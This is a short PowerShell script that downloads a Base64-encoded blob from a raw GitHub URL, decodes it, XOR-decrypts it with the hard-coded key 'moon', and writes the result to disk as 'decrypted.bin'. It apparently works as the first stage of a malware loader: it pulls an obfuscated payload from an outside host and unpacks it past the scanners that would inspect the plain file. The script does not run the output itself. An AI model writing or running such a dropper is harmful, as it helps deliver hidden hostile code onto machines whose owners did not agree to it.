$u='https://raw.githubusercontent.com/Jakeryan500/a/refs/heads/main/skibidi'
# XOR key
$k = "moon"

# Download Base64
$d = (Invoke-WebRequest $u -UseBasicParsing).Content
$d = $d -replace '\s',''

# Decode Base64
$b = [Convert]::FromBase64String($d)

# Key bytes
$kb = [Text.Encoding]::UTF8.GetBytes($k)
if ($kb.Length -eq 0) { throw "Key is empty" }

# XOR decrypt
$out = New-Object byte[] $b.Length

for ($i = 0; $i -lt $b.Length; $i++) {
    $out[$i] = $b[$i] -bxor $kb[$i % $kb.Length]
}

# Save decrypted file
[IO.File]::WriteAllBytes(".\decrypted.bin", $out)
